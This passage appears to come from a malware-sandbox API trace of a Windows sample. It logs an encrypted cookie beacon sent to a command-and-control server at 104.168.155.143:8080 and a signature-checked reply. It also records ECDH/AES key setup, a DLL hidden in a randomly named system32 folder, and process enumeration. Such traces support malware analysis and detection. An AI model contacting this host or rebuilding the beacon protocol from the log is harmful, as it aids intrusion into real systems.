lpszServerName="104.168.155.143", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0115.000] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0115.002] GetProcessHeap () returned 0x500000 [0115.002] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0115.002] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0xce2e0*, dwBufferLength=0x4) returned 1 [0115.002] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xce2e0, lpdwBufferLength=0xce2e4 | out: lpBuffer=0xce2e0, lpdwBufferLength=0xce2e4) returned 0 [0115.002] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xce2e0*, dwBufferLength=0x4) returned 1 [0115.002] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: WDt=wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmMwhCBY5EjisrBmaXx4HtoKlbW1e6/c+RcOQFIPHqXIOcQ7vBkH/sgHZgCrg2DUiP/OSDOUsvJsmnKVS34Kir+5IJMzKlzzbofEojY+LQmqe/tm3CgzW0eF0Y2EiBjFAIgBUjewCx7zHS26yJSZuC1f2O1mVIaDJGglY+I6yqaM04r6fKAvoGRt+WPxZbR5wklDJjczSr5Uk4m5jJ8M4loYxkopYg3eGtKXC7qWRfxYqMTl2QkHErzs4qhWT6X4l5yBGOVGuVp+HHExej0mzcV95OstI99rSSJv0d\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0119.021] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xce21c, lpdwBufferLength=0xce218, lpdwIndex=0x0 | out: lpBuffer=0xce21c*, lpdwBufferLength=0xce218*=0x4, lpdwIndex=0x0) returned 1 [0119.021] GetProcessHeap () returned 0x500000 [0119.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10000) returned 0x2464090 [0119.023] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2464090, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2464090*, lpdwNumberOfBytesRead=0xce1e8*=0x135) returned 1 [0119.023] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x24641c5, dwNumberOfBytesToRead=0xfecb, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x24641c5*, lpdwNumberOfBytesRead=0xce1e8*=0x0) returned 1 [0119.023] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0119.023] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0119.023] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0119.023] GetProcessHeap () returned 0x500000 [0119.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24d44b0 | out: hHeap=0x500000) returned 1 [0119.023] GetProcessHeap () returned 0x500000 [0119.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0119.023] BCryptDecrypt (in: hKey=0x532ca0, pbInput=0x2464090, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0xce268, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x0, pcbResult=0xce268) returned 0x0 [0119.023] GetProcessHeap () returned 0x500000 [0119.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x60) returned 0x2497390 [0119.028] BCryptDecrypt (in: hKey=0x532ca0, pbInput=0x2464090, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2497390, cbOutput=0x60, pcbResult=0xce268, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x2497390, pcbResult=0xce268) returned 0x0 [0119.028] GetProcessHeap () returned 0x500000 [0119.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb470 [0119.028] GetProcessHeap () returned 0x500000 [0119.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f8c50 [0119.028] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce168, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce168) returned 0x0 [0119.028] GetProcessHeap () returned 0x500000 [0119.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb470 | out: hHeap=0x500000) returned 1 [0119.028] GetProcessHeap () returned 0x500000 [0119.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f8c50 | out: hHeap=0x500000) returned 1 [0119.028] GetProcessHeap () returned 0x500000 [0119.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427310 [0119.029] BCryptGetProperty (in: hObject=0x574560, pszProperty="ObjectLength", pbOutput=0xce178, cbOutput=0x4, pcbResult=0xce180, dwFlags=0x0 | out: pbOutput=0xce178, pcbResult=0xce180) returned 0x0 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427310 | out: hHeap=0x500000) returned 1 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x572da0 [0119.029] BCryptCreateHash (in: hAlgorithm=0x574560, phHash=0xce160, pbHashObject=0x572da0, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x574560, phHash=0xce160, pbHashObject=0x572da0) returned 0x0 [0119.029] BCryptHashData (in: hHash=0x572da0, pbInput=0x24973d8, cbInput=0x8, dwFlags=0x0 | out: hHash=0x572da0) returned 0x0 [0119.029] BCryptFinishHash (in: hHash=0x572da0, pbOutput=0xce248, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x572da0, pbOutput=0xce248) returned 0x0 [0119.029] BCryptDestroyHash (in: hHash=0x572da0 | out: hHash=0x572da0) returned 0x0 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x572da0 | out: hHeap=0x500000) returned 1 [0119.029] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574560, dwFlags=0x0 | out: hAlgorithm=0x574560) returned 0x0 [0119.029] BCryptVerifySignature (hKey=0x530610, pPaddingInfo=0x0, pbHash=0xce248, cbHash=0x20, pbSignature=0x2497394, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x23f8020 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2497390 | out: hHeap=0x500000) returned 1 [0119.029] GetProcessHeap () returned 0x500000 [0119.029] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2464090 | out: hHeap=0x500000) returned 1 [0119.029] WaitForSingleObject (hHandle=0x2a8, dwMilliseconds=0x0) returned 0x102 [0119.029] lstrcpyW (in: lpString1=0xce390, lpString2="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" | out: lpString1="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" [0119.030] PathFindFileNameW (pszPath="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned="GQeyw.dll" [0119.030] GetProcessHeap () returned 0x500000 [0119.030] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb790 [0119.030] _snwprintf (in: _Dest=0xcdf00, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Windows\\system32\\GnynPsiyLKdYjn\\\\*") returned 37 [0119.030] GetProcessHeap () returned 0x500000 [0119.030] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb790 | out: hHeap=0x500000) returned 1 [0119.030] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\GnynPsiyLKdYjn\\\\*" (normalized: "c:\\windows\\system32\\gnynpsiylkdyjn\\*"), lpFindFileData=0xcdcb0 | out: lpFindFileData=0xcdcb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e40ee75, ftCreationTime.dwHighDateTime=0x1d8dc25, ftLastAccessTime.dwLowDateTime=0x5e7fd8e1, ftLastAccessTime.dwHighDateTime=0x1d8dc25, ftLastWriteTime.dwLowDateTime=0x5e7fd8e1, ftLastWriteTime.dwHighDateTime=0x1d8dc25, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2548d00, cFileName=".", cAlternateFileName="")) returned 0x24b9040 [0119.030] FindNextFileW (in: hFindFile=0x24b9040, lpFindFileData=0xcdcb0 | out: lpFindFileData=0xcdcb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e40ee75, ftCreationTime.dwHighDateTime=0x1d8dc25, ftLastAccessTime.dwLowDateTime=0x5e7fd8e1, ftLastAccessTime.dwHighDateTime=0x1d8dc25, ftLastWriteTime.dwLowDateTime=0x5e7fd8e1, ftLastWriteTime.dwHighDateTime=0x1d8dc25, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2548d00, cFileName="..", cAlternateFileName="")) returned 1 [0119.030] FindNextFileW (in: hFindFile=0x24b9040, lpFindFileData=0xcdcb0 | out: lpFindFileData=0xcdcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216b2400, ftCreationTime.dwHighDateTime=0x1d8dc25, ftLastAccessTime.dwLowDateTime=0x2203ba80, ftLastAccessTime.dwHighDateTime=0x1d8dc25, ftLastWriteTime.dwLowDateTime=0x5f81d00, ftLastWriteTime.dwHighDateTime=0x1d8dc15, nFileSizeHigh=0x0, nFileSizeLow=0x89000, dwReserved0=0x0, dwReserved1=0x2548d00, cFileName="GQeyw.dll", cAlternateFileName="")) returned 1 [0119.030] PathCombineW (in: pszDest=0xcd9e0, pszDir="C:\\Windows\\system32\\GnynPsiyLKdYjn\\", pszFile="GQeyw.dll" | out: pszDest="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" [0119.031] lstrcmpiW (lpString1="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll", lpString2="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned 0 [0119.031] FindNextFileW (in: hFindFile=0x24b9040, lpFindFileData=0xcdcb0 | out: lpFindFileData=0xcdcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216b2400, ftCreationTime.dwHighDateTime=0x1d8dc25, ftLastAccessTime.dwLowDateTime=0x2203ba80, ftLastAccessTime.dwHighDateTime=0x1d8dc25, ftLastWriteTime.dwLowDateTime=0x5f81d00, ftLastWriteTime.dwHighDateTime=0x1d8dc15, nFileSizeHigh=0x0, nFileSizeLow=0x89000, dwReserved0=0x0, dwReserved1=0x2548d00, cFileName="GQeyw.dll", cAlternateFileName="")) returned 0 [0119.031] FindClose (in: hFindFile=0x24b9040 | out: hFindFile=0x24b9040) returned 1 [0119.031] GetProcessHeap () returned 0x500000 [0119.031] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f8020 | out: hHeap=0x500000) returned 1 [0119.031] GetProcessHeap () returned 0x500000 [0119.031] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x245e3a0 | out: hHeap=0x500000) returned 1 [0119.031] WaitForSingleObject (hHandle=0x1fc, dwMilliseconds=0x15094) Thread: id = 15 os_tid = 0x11a0 Thread: id = 16 os_tid = 0x10dc Thread: id = 17 os_tid = 0x10bc Thread: id = 18 os_tid = 0x10d4 Thread: id = 19 os_tid = 0x10d8 Thread: id = 20 os_tid = 0x10ec Thread: id = 21 os_tid = 0x10b8 [0116.895] GetProcessHeap () returned 0x500000 [0116.897] GetModuleHandleA (lpModuleName="NTDLL") returned 0x7ffe97fe0000 [0116.908] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x58) returned 0x24b9b80 [0116.908] GetProcessHeap () returned 0x500000 [0116.908] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427250 [0116.998] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7ffe97600000 [0116.998] GetProcessHeap () returned 0x500000 [0116.998] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427250 | out: hHeap=0x500000) returned 1 [0116.998] GetProcessHeap () returned 0x500000 [0116.999] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb750 [0116.999] LoadLibraryW (lpLibFileName="bcrypt.dll") returned 0x7ffe94490000 [0116.999] GetProcessHeap () returned 0x500000 [0116.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb750 | out: hHeap=0x500000) returned 1 [0116.999] GetProcessHeap () returned 0x500000 [0116.999] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23ebb30 [0116.999] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x7ffe951c0000 [0116.999] GetProcessHeap () returned 0x500000 [0116.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23ebb30 | out: hHeap=0x500000) returned 1 [0116.999] GetProcessHeap () returned 0x500000 [0117.000] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb850 [0117.000] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7ffe95e70000 [0117.000] GetProcessHeap () returned 0x500000 [0117.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb850 | out: hHeap=0x500000) returned 1 [0117.000] GetProcessHeap () returned 0x500000 [0117.000] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb750 [0117.000] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7ffe95df0000 [0117.000] GetProcessHeap () returned 0x500000 [0117.000] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb750 | out: hHeap=0x500000) returned 1 [0117.000] GetProcessHeap () returned 0x500000 [0117.000] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb8f0 [0117.000] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x7ffe8ac40000 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb8f0 | out: hHeap=0x500000) returned 1 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23ebb30 [0117.001] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x7ffe93d60000 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23ebb30 | out: hHeap=0x500000) returned 1 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb3f0 [0117.001] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x7ffe89ce0000 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb3f0 | out: hHeap=0x500000) returned 1 [0117.001] GetProcessHeap () returned 0x500000 [0117.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427dc0 [0117.001] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x7ffe92df0000 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427dc0 | out: hHeap=0x500000) returned 1 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x23f9150 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4000) returned 0x24d84c0 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x23f7f00 [0117.002] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bffd68, pszAlgId="RNG", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x2bffd68) returned 0x0 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f7f00 | out: hHeap=0x500000) returned 1 [0117.002] BCryptGenRandom (in: hAlgorithm=0x573f20, pbBuffer=0x24d84c0, cbBuffer=0x4000, dwFlags=0x0 | out: pbBuffer=0x24d84c0) returned 0x0 [0117.002] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x573f20, dwFlags=0x0 | out: hAlgorithm=0x573f20) returned 0x0 [0117.002] GetProcessHeap () returned 0x500000 [0117.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x24273d0 [0117.002] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x220) returned 0x50df50 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427b50 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x24277c0 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427760 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427700 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427400 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x24278e0 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427d90 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427430 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x24279a0 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x2427ca0 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x50df50 | out: hHeap=0x500000) returned 1 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x80) returned 0x5f5350 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb930 [0117.003] GetProcessHeap () returned 0x500000 [0117.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f8c50 [0117.003] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bffc50, pszAlgId="ECDH_P256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2bffc50) returned 0x0 [0117.005] GetProcessHeap () returned 0x500000 [0117.005] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb930 | out: hHeap=0x500000) returned 1 [0117.005] GetProcessHeap () returned 0x500000 [0117.005] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f8c50 | out: hHeap=0x500000) returned 1 [0117.005] BCryptGenerateKeyPair (in: hAlgorithm=0x574560, phKey=0x2bffc48, dwLength=0x100, dwFlags=0x0 | out: hAlgorithm=0x574560, phKey=0x2bffc48) returned 0x0 [0117.005] BCryptFinalizeKeyPair (in: hKey=0x2427250, dwFlags=0x0 | out: hKey=0x2427250) returned 0x0 [0117.005] GetProcessHeap () returned 0x500000 [0117.005] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427340 [0117.005] BCryptExportKey (in: hKey=0x2427250, hExportKey=0x0, pszBlobType="ECCPUBLICBLOB", pbOutput=0x2bffc70, cbOutput=0x48, pcbResult=0x2bffc40, dwFlags=0x0 | out: pbOutput=0x2bffc70, pcbResult=0x2bffc40) returned 0x0 [0117.006] GetProcessHeap () returned 0x500000 [0117.006] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427340 | out: hHeap=0x500000) returned 1 [0117.006] GetProcessHeap () returned 0x500000 [0117.006] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427820 [0117.006] BCryptImportKeyPair (in: hAlgorithm=0x574560, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x2bffc60, pbInput=0x531010, cbInput=0x48, dwFlags=0x0 | out: phKey=0x2bffc60) returned 0x0 [0117.006] GetProcessHeap () returned 0x500000 [0117.006] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427820 | out: hHeap=0x500000) returned 1 [0117.006] BCryptSecretAgreement (in: hPrivKey=0x2427250, hPubKey=0x2427b80, phAgreedSecret=0x2bffc58, dwFlags=0x0 | out: phAgreedSecret=0x2bffc58) returned 0x0 [0117.007] GetProcessHeap () returned 0x500000 [0117.007] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x23f80d0 [0117.007] GetProcessHeap () returned 0x500000 [0117.007] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f96a0 [0117.007] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bffb10, pszAlgId="AES", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2bffb10) returned 0x0 [0117.008] GetProcessHeap () returned 0x500000 [0117.008] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f80d0 | out: hHeap=0x500000) returned 1 [0117.008] GetProcessHeap () returned 0x500000 [0117.008] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f96a0 | out: hHeap=0x500000) returned 1 [0117.008] GetProcessHeap () returned 0x500000 [0117.008] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb3d0 [0117.008] GetProcessHeap () returned 0x500000 [0117.008] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb8f0 [0117.009] lstrlenW (lpString="SHA256") returned 6 [0117.009] BCryptDeriveKey (in: hSharedSecret=0x23eba90, pwszKDF="HASH", pParameterList=0x2bffb28, pbDerivedKey=0x2bffb54, cbDerivedKey=0x20, pcbResult=0x2bffb08, dwFlags=0x0 | out: pbDerivedKey=0x2bffb54, pcbResult=0x2bffb08) returned 0x0 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb3d0 | out: hHeap=0x500000) returned 1 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb8f0 | out: hHeap=0x500000) returned 1 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427d30 [0117.009] BCryptGetProperty (in: hObject=0x573020, pszProperty="ObjectLength", pbOutput=0x5f5360, cbOutput=0x4, pcbResult=0x2bffb08, dwFlags=0x0 | out: pbOutput=0x5f5360, pcbResult=0x2bffb08) returned 0x0 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427d30 | out: hHeap=0x500000) returned 1 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28e) returned 0x54e220 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb750 [0117.009] BCryptImportKey (in: hAlgorithm=0x573020, hImportKey=0x0, pszBlobType="KeyDataBlob", phKey=0x5f53b0, pbKeyObject=0x54e220, cbKeyObject=0x28e, pbInput=0x2bffb48, cbInput=0x2c, dwFlags=0x0 | out: phKey=0x5f53b0, pbKeyObject=0x54e220) returned 0x0 [0117.009] GetProcessHeap () returned 0x500000 [0117.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb750 | out: hHeap=0x500000) returned 1 [0117.009] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x573020, dwFlags=0x0 | out: hAlgorithm=0x573020) returned 0x0 [0117.009] BCryptDestroySecret (in: hSecret=0x23eba90 | out: hSecret=0x23eba90) returned 0x0 [0117.009] BCryptDestroyKey (in: hKey=0x2427b80 | out: hKey=0x2427b80) returned 0x0 [0117.009] BCryptDestroyKey (in: hKey=0x2427250 | out: hKey=0x2427250) returned 0x0 [0117.009] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574560, dwFlags=0x0 | out: hAlgorithm=0x574560) returned 0x0 [0117.009] GetProcessHeap () returned 0x500000 [0117.010] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb6b0 [0117.010] GetProcessHeap () returned 0x500000 [0117.010] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f9240 [0117.010] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bffcb8, pszAlgId="ECDSA_P256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2bffcb8) returned 0x0 [0117.010] GetProcessHeap () returned 0x500000 [0117.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb6b0 | out: hHeap=0x500000) returned 1 [0117.010] GetProcessHeap () returned 0x500000 [0117.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f9240 | out: hHeap=0x500000) returned 1 [0117.010] GetProcessHeap () returned 0x500000 [0117.010] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427d00 [0117.010] BCryptImportKeyPair (in: hAlgorithm=0x574920, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x5f5350, pbInput=0x531740, cbInput=0x48, dwFlags=0x0 | out: phKey=0x5f5350) returned 0x0 [0117.010] GetProcessHeap () returned 0x500000 [0117.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427d00 | out: hHeap=0x500000) returned 1 [0117.011] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574920, dwFlags=0x0 | out: hAlgorithm=0x574920) returned 0x0 [0117.011] lstrlenA (lpString="XC64ZB_0C287F38") returned 15 [0117.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x61c [0117.026] Process32FirstW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.028] GetCurrentProcessId () returned 0xde0 [0117.028] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0117.029] GetCurrentProcessId () returned 0xde0 [0117.029] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0117.030] GetCurrentProcessId () returned 0xde0 [0117.030] GetProcessHeap () returned 0x500000 [0117.030] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x50df50 [0117.030] lstrcpyW (in: lpString1=0x50df58, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0117.030] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, 